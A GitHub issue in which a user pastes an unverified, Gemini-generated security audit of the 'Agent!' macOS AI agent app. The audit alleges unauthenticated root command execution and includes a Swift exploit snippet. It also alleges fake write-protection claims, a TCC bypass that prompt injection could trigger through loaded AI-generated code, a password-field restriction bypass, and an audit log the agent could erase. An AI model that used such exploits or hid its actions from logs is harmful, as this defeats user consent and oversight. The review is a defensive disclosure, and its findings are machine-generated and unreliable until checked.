awareness - gemini feedback regarding security implications of implementation #1
Description
hello!
This looks like an interesting project. Based on my existing knowledge about some of the challenges of this type of project, I had gemini perform an initial security review of the code for me:
- it's an LLM generated review. While I think at least some of the commentary is interesting as a basis for further discussion, it is not a formal security review, and anyone else reading this gh issue should DYOR before treating anything suggested in this issue as fact
- my instinct is the feedback gemini is generating, is based on this being an early stage software project, as opposed to you actually attempting to lure people to install a deliberately designed as a Remote Access Trojan
Either way, I think it's worth you considering the feedback below that gemini produced:
- in the way the repo / project is currently organised, it may trigger alerts for being a RAT
- reading the code references highlighted by gemini, I'd need to look at this in more detail in a better sandboxed environment before reaching any conclusion - I initially thought it would be a quick review and then test, but there are a few things here I need to understand better
looking forward to see how you iterate on this project!
gemini review output below. I initially reviewed the 1.0.7 tag, but based on what I saw there, it seemed more useful to review the current main/HEAD:
# Verified Security Audit Report: Agent! Project
**Date:** March 31, 2026
**Commit:** `fc6029c46019acd7fe9b02acee39073d0334e3b8`
## 1. Local Privilege Escalation (Unauthenticated Root Execution)
The project continues to expose a critical Mach service that allows any local process to execute arbitrary commands as root.
* **Vulnerability:** The `AgentHelper` XPC service performs zero caller validation. The `NSXPCListenerDelegate` implementation in `AgentXcode/AgentHelper/main.swift` (L101) accepts all connections without checking the `auditToken` or `processIdentifier`.
* **Mechanism:** Any process on the system can connect to `Agent.app.toddbruss.helper` and call `execute(script:instanceID:withReply:)`, which runs the provided string directly via `/bin/zsh -c` as the root user.
* **Exploitation Example:** An attacker can use the following Swift code in a standalone binary (with no special permissions) to gain root access:
```swift
let connection = NSXPCConnection(machServiceName: "Agent.app.toddbruss.helper")
connection.remoteObjectInterface = NSXPCInterface(with: HelperToolProtocol.self)
connection.resume()
let helper = connection.remoteObjectProxy as! HelperToolProtocol
helper.execute(script: "whoami > /tmp/pwned", instanceID: "attack") { status, output in
print("Executed as: \(output)") // Returns "root"
}
```
## 2. Fabricated Security Features (Documentation vs. Reality)
The project's security documentation makes explicitly false claims about protection mechanisms that do not exist in the code.
* **Fabricated "Write Protection":** `SECURITY.md` (L43) claims that `apple_event_query` blocks destructive operations (`delete`, `close`, `move`, `quit`) by default unless an `allow_writes` parameter is set.
* **Reality:** `AgentXcode/Agent/Views/Services/AppleEventService.swift` (L210) contains **no filtering logic** for these actions. It uses dynamic Objective-C dispatch to execute any method name provided by the AI or user. There is no code that checks for an `allow_writes` parameter.
* **Impact:** Users are misled into believing destructive actions are restricted when they are actually fully enabled.
## 3. TCC Bypass via Arbitrary In-Process Code Execution
The "AgentScript" feature provides a mechanism to run arbitrary code within the main application's process, inheriting all TCC permissions granted by the user.
* **Vulnerability:** `ScriptService` (specifically `ScriptService+Metadata.swift` L281) uses `dlopen` to load dynamic libraries (`.dylib`) compiled from AI-generated Swift code.
* **Impact:** This allows an attacker (via prompt injection or malicious instructions) to execute code that accesses the Screen, Camera, Microphone, and Accessibility APIs without further user interaction, leveraging the "trust" already granted to the `Agent!` app.
## 4. Accessibility Restriction Bypass (Input Simulation)
The input simulation tools effectively ignore the "Security Hardening" settings described in the UI.
* **Vulnerability:** While `performAction` (in `AccessibilityService+Actions.swift`) checks for "restricted roles," the primary input tools `ax_click` and `ax_type_text` use `CGEvent` directly at the window server level.
* **Impact:** `CGEvent` ignores accessibility roles entirely. This means the agent can click on or type into restricted fields (like `AXSecureTextField` / password fields) even if they are marked as "blocked" in the application settings.
* **Proof (Code):**
```swift
// AgentXcode/Agent/Views/Services/AccessibilityService+Actions.swift
// L60: func typeText(_ text: String, at x: CGFloat? = nil, y: CGFloat? = nil) -> String {
// L83: if let event = CGEvent(keyboardEventSource: source, virtualKey: 0x24, keyDown: true) {
// L84: event.post(tap: CGEventTapLocation.cgSessionEventTap)
// ... No role-based or restriction checks are performed before posting the event.
```
## 5. Non-Tamper-Evident Audit Logging
The "Phase 5 Security Hardening" audit log is trivially bypassable.
* **Vulnerability:** `AccessibilityService.swift` logs actions to `~/Documents/AgentScript/logs/accessibility_audit.log` (L481 in `AccessibilityService+Window.swift`).
* **Impact:** Because the agent has native shell and file access, it (or an attacker controlling it) can easily modify or delete this log file to hide malicious activity. There is no integration with the system unified log (`os_log`) for these audit events, and the log location is user-writable.
## Conclusion
The architecture of the `Agent!` project is fundamentally insecure. It provides multiple paths for local privilege escalation and TCC bypass while providing documentation that falsely reassures users about non-existent safeguards.
**Recommendation:** This software should be treated as a high-risk security threat. All components, specifically the `AgentHelper` LaunchDaemon, should be removed immediately.